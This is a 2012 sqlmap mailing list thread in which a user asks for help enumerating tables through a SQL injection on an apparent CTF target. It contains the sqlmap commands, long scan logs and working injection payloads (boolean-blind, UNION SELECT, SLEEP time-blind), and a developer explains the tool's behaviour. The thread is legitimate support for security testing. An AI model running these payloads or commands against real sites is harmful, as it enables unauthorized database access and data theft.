Re: [sqlmap-users] I am not finding table names from db names with sqlmap..is there any idea?
From: Fırat C. E. <fc....@gm...> - 2012-04-27 18:03:02
Okay, I resolved it. :) Thanks a lot Chris and Miroslav... I resolved this problem. :) Not sqlmap 1.0 but r4766, not sqlmap 0.9 but r5022; it should be 1.0 and r5022. Thanks so much again. :)

Best Regards

On 27 April 2012 20:42, Chris Oakley <chr...@gm...> wrote:

> Hi
>
> Just thought I'd point out that it looks like you're running 0.9 stable
> and not the 1.0 latest repository version.
>
> Regards
>
> Chris
>
>
> 2012/4/27 Fırat Celal Erdik <fc....@gm...>
>
>> Hi Miroslav,
>> First, thanks a lot for your fast reply. I found this value ( 38' OR '38'='38 ) in the w3af output. You know too, w3af is a vulnerability scanner for web applications. I got this value from w3af, and I attached a w3af screenshot about this vulnerability. This is a boolean-based SQL injection.
>>
>> When I gave this value (38' OR '38'='38) to the "kelime" parameter manually in sqlmap revision r4766, I had the output below for enumerating database names.
>>
>> root@pamuksekeri-pc:/pentest/database/sqlmap# ./sqlmap.py -u http://level4.hack2net.com/projects.php --forms --dbs
>> .....
>> .....
>> POST http://level4.hack2net.com:80/projects.php?form=ara
>> POST data: kelime=&tur=1&aramayap=Ara
>> do you want to test this form? [Y/n/q]
>> > y
>>
>> .....
>> .....
>> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank fields detected): kelime=38' OR '38'='38
>> .....
>> .....
>>
>> web application technology: PHP 5.3.5
>> back-end DBMS: MySQL 5.0.11
>> [17:27:54] [INFO] fetching database names
>> available databases [4]:
>> [*] ctf2
>> [*] information_schema
>> [*] mysql
>> [*] test
>>
>> After this database name enumeration, I gave the command below for enumerating table names, but sqlmap didn't find any table names:
>>
>> root@pamuksekeri-pc:/pentest/database/sqlmap# ./sqlmap.py -u http://level4.hack2net.com/projects.php --forms -D ctf2 --tables
>> .....
>> .....
>> POST http://level4.hack2net.com:80/projects.php?form=ara
>> POST data: kelime=&tur=1&aramayap=Ara
>> do you want to test this form? [Y/n/q]
>> > y
>> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank fields detected): kelime=38' OR '38'='38
>> .....
>> .....
>> but sqlmap didn't find any table names; it passed on to the second form.
>>
>> I updated to sqlmap revision r5022 now.. but I didn't get any database names now :) output is below.
>>
>> root@pamuksekeri-pc:/home/pamuksekeri/Desktop/sqlmap# ./sqlmap.py -u http://level4.hack2net.com/projects.php --forms --dbs
>>
>> sqlmap/0.9 - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 19:46:09
>>
>> [19:46:12] [INFO] testing connection to the target url
>> [19:46:21] [INFO] searching for forms
>> [19:46:22] [INFO] sqlmap got a total of 2 targets
>> [#1] form:
>> POST http://level4.hack2net.com:80/projects.php?form=ara
>> POST data: kelime=&tur=1&aramayap=Ara
>> do you want to test this form? [Y/n/q]
>> > y
>> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank fields detected): kelime=38' OR '38'='38&tur=4&aramayap=Ara
>> [19:47:31] [INFO] using '/home/pamuksekeri/Desktop/sqlmap/output/level4.hack2net.com/session' as session file
>> [19:47:50] [INFO] testing if the url is stable, wait a few seconds
>> [19:47:54] [INFO] url is stable
>> [19:47:54] [INFO] testing if POST parameter 'tur' is dynamic
>> [19:47:59] [INFO] confirming that POST parameter 'tur' is dynamic
>> [19:48:00] [INFO] POST parameter 'tur' is dynamic
>> [19:48:01] [WARNING] heuristic test shows that POST parameter 'tur' might not be injectable
>> [19:48:01] [INFO] testing sql injection on POST parameter 'tur'
>> [19:48:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [19:48:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>> [19:48:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>> [19:48:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>> [19:48:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>> [19:48:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [19:48:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [19:48:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [19:48:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [19:48:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [19:48:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [19:48:56] [INFO] testing 'Oracle AND time-based blind'
>> [19:49:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [19:49:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [19:49:49] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
>> [19:50:51] [WARNING] POST parameter 'tur' is not injectable
>> [19:50:51] [INFO] testing if POST parameter 'aramayap' is dynamic
>> [19:50:52] [WARNING] POST parameter 'aramayap' is not dynamic
>> [19:50:53] [WARNING] heuristic test shows that POST parameter 'aramayap' might not be injectable
>> [19:50:53] [INFO] testing sql injection on POST parameter 'aramayap'
>> [19:50:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [19:51:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>> [19:51:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>> [19:51:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>> [19:51:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>> [19:51:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [19:51:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [19:51:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [19:51:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [19:51:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [19:51:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [19:51:56] [INFO] testing 'Oracle AND time-based blind'
>> [19:52:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [19:52:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [19:52:49] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
>> [19:53:47] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
>> [19:54:04] [WARNING] POST parameter 'aramayap' is not injectable
>> [19:54:04] [INFO] testing if GET parameter 'form' is dynamic
>> [19:54:06] [WARNING] GET parameter 'form' is not dynamic
>> [19:54:07] [WARNING] heuristic test shows that GET parameter 'form' might not be injectable
>> [19:54:07] [INFO] testing sql injection on GET parameter 'form'
>> [19:54:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [19:54:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>> [19:54:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>> [19:55:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>> [19:55:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>> [19:55:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [19:55:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [19:55:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [19:55:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [19:55:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [19:55:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [19:55:39] [INFO] testing 'Oracle AND time-based blind'
>> [19:55:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [19:57:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [19:57:05] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
>> [19:57:53] [WARNING] GET parameter 'form' is not injectable
>> [19:57:54] [ERROR] all parameters are not injectable, try to increase --level/--risk values to perform more tests. Rerun without providing the --technique switch. Give it a go with the --text-only switch if the target page has a low percentage of textual content (~22.06% of page content is text), skipping to the next form
>> [#2] form:
>> POST http://level4.hack2net.com:80/projects.php
>> POST data: Ara=Ara
>> do you want to test this form? [Y/n/q]
>> > n
>>
>> [*] shutting down at: 20:04:22
>>
>> And then I passed with Enter, without editing the POST data, in this command. The output is below (in revision r5022).
>>
>> root@pamuksekeri-pc:/home/pamuksekeri/Desktop/sqlmap# ./sqlmap.py -u http://level4.hack2net.com/projects.php --forms --dbs
>>
>> sqlmap/0.9 - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 20:04:31
>>
>> [20:04:32] [INFO] testing connection to the target url
>> [20:04:39] [INFO] searching for forms
>> [20:04:40] [INFO] sqlmap got a total of 2 targets
>> [#1] form:
>> POST http://level4.hack2net.com:80/projects.php?form=ara
>> POST data: kelime=&tur=1&aramayap=Ara
>> do you want to test this form? [Y/n/q]
>> > y
>> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank fields detected):
>> do you want to fill blank fields with random values? [Y/n] y
>> [20:04:46] [INFO] using '/home/pamuksekeri/Desktop/sqlmap/output/level4.hack2net.com/session' as session file
>> [20:04:48] [INFO] testing if the url is stable, wait a few seconds
>> [20:04:50] [INFO] url is stable
>> [20:04:50] [INFO] testing if POST parameter 'kelime' is dynamic
>> [20:04:52] [WARNING] POST parameter 'kelime' is not dynamic
>> [20:04:54] [WARNING] heuristic test shows that POST parameter 'kelime' might not be injectable
>> [20:04:54] [INFO] testing sql injection on POST parameter 'kelime'
>> [20:04:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [20:05:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>> [20:05:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>> [20:05:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>> [20:05:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>> [20:05:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [20:05:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [20:05:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [20:05:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [20:05:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [20:06:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [20:06:05] [INFO] testing 'Oracle AND time-based blind'
>> [20:06:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [20:06:21] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [20:07:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [20:07:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
>> [20:08:07] [WARNING] POST parameter 'kelime' is not injectable
>>
>> sqlmap said the kelime parameter is not vulnerable :) why?? I know this parameter is vulnerable.. because other competitors in the CTF exploited this vulnerability and got all the data in the database :) The w3af output says this parameter is vulnerable.
>>
>> How can I find the right vulnerable point in http://level4.hack2net.com/ and exploit it successfully? If you have any time and help me with this topic, I will be so happy :)
>>
>> Thanks a lot again.
>> Best Regards
>>
>>
>> On 27 April 2012 16:17, Miroslav Stampar <mir...@gm...> wrote:
>>
>>> Hi Firat.
>>>
>>> First of all, please always keep your sqlmap up to date. The current revision is r5022 and you are running r4766.
>>>
>>> Second, could you please explain how you got "OR '38'='38'" inside those payloads. We already have mechanisms to prevent this kind of "user behavior" but you've obviously circumvented that somehow (--prefix, or maybe you've entered that one manually inside the form search prompts). The thing is that OR A=A is never a smart thing to do inside SQL injection tool(s). That's simply because OR 1=1 always results in TRUE, potentially screwing the user with false results.
>>>
>>> Third, it would be great if you could send the database names you've retrieved. It's quite possible that there are some permission problems you are experiencing around the system "mysql" database. Also, you are maybe experiencing permission problems when accessing the "information_schema" database for retrieving identifier names.
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> 2012/4/27 Fırat Celal Erdik <fc....@gm...>
>>>
>>>> Hi,
>>>> Is there anybody who can help me with a MySQL boolean-based SQL injection exploitation with sqlmap? I found database names with sqlmap but I didn't find any tables in any database. I don't want to use a common table names file for finding table names. So, how can I get the full table names with sqlmap or another tool? I tried havij but I cannot find any table name with it. Is there any idea?
>>>>
>>>> I had this error on sqlmap:
>>>>
>>>> ./sqlmap.py -u http://level4.hack2net.com/projects.php --forms -D mysql --tables
>>>>
>>>>     sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
>>>>     http://www.sqlmap.org
>>>>
>>>> [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
>>>>
>>>> [*] starting at 15:01:42
>>>>
>>>> [15:01:42] [INFO] testing connection to the target url
>>>> [15:01:43] [INFO] searching for forms
>>>> [15:01:43] [INFO] sqlmap got a total of 2 targets
>>>> [#1] form:
>>>> POST http://level4.hack2net.com:80/projects.php?form=ara
>>>> POST data: kelime=&tur=1&aramayap=Ara
>>>> do you want to test this form? [Y/n/q]
>>>> > y
>>>> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank fields detected):
>>>> do you want to fill blank fields with random values? [Y/n] y
>>>> [15:01:50] [INFO] using '/pentest/database/sqlmap/output/level4.hack2net.com/session' as session file
>>>> [15:01:50] [INFO] resuming injection data from session file
>>>> [15:01:50] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
>>>> [15:01:50] [INFO] using '/pentest/database/sqlmap/output/results-04272012_0301pm.csv' as results file
>>>> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
>>>> ---
>>>> Place: POST
>>>> Parameter: kelime
>>>>     Type: boolean-based blind
>>>>     Title: AND boolean-based blind - WHERE or HAVING clause
>>>>     Payload: kelime=38' OR '38'='38' AND 5116=5116 AND 'Hbnf'='Hbnf&tur=4&aramayap=Ara
>>>>
>>>>     Type: UNION query
>>>>     Title: MySQL UNION query (NULL) - 5 columns
>>>>     Payload: kelime=38' OR '38'='38' UNION ALL SELECT CONCAT(0x3a6e656f3a,0x65594a514b5846697976,0x3a776f673a), NULL, NULL, NULL, NULL# AND 'ecra'='ecra&tur=4&aramayap=Ara
>>>>
>>>>     Type: AND/OR time-based blind
>>>>     Title: MySQL > 5.0.11 AND time-based blind
>>>>     Payload: kelime=38' OR '38'='38' AND SLEEP(5) AND 'mlpI'='mlpI&tur=4&aramayap=Ara
>>>> ---
>>>>
>>>> do you want to exploit this SQL injection? [Y/n] y
>>>> [15:01:56] [INFO] the back-end DBMS is MySQL
>>>>
>>>> web application technology: PHP 5.3.5
>>>> back-end DBMS: MySQL 5.0.11
>>>> [15:01:56] [INFO] fetching tables for database: mysql
>>>> [15:01:56] [INFO] fetching number of tables for database 'mysql'
>>>> [15:01:56] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
>>>> [15:01:56] [INFO] retrieved:
>>>> [15:01:58] [WARNING] unable to retrieve the number of tables for database 'mysql'
>>>> [15:01:58] [ERROR] unable to retrieve the table names for any database
>>>> do you want to use common table existence check? [Y/n/q]
>>>>
>>>> Thanks a lot..
>>>>
>>>> --
>>>> Fırat Celal Erdik
>>>> Security Specialist, Certified Ethical Hacker - C|EH
>>>> http://www.networkpentest.net
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Live Security Virtual Conference
>>>> Exclusive live event will cover all the ways today's security and
>>>> threat landscape has changed and how IT managers can respond. Discussions
>>>> will include endpoint security, mobile security and the latest in malware
>>>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>
>> --
>> Fırat Celal Erdik
>> Security Specialist, Certified Ethical Hacker - C|EH
>> http://www.networkpentest.net

--
Fırat Celal Erdik
Security Specialist, Certified Ethical Hacker - C|EH
http://www.networkpentest.net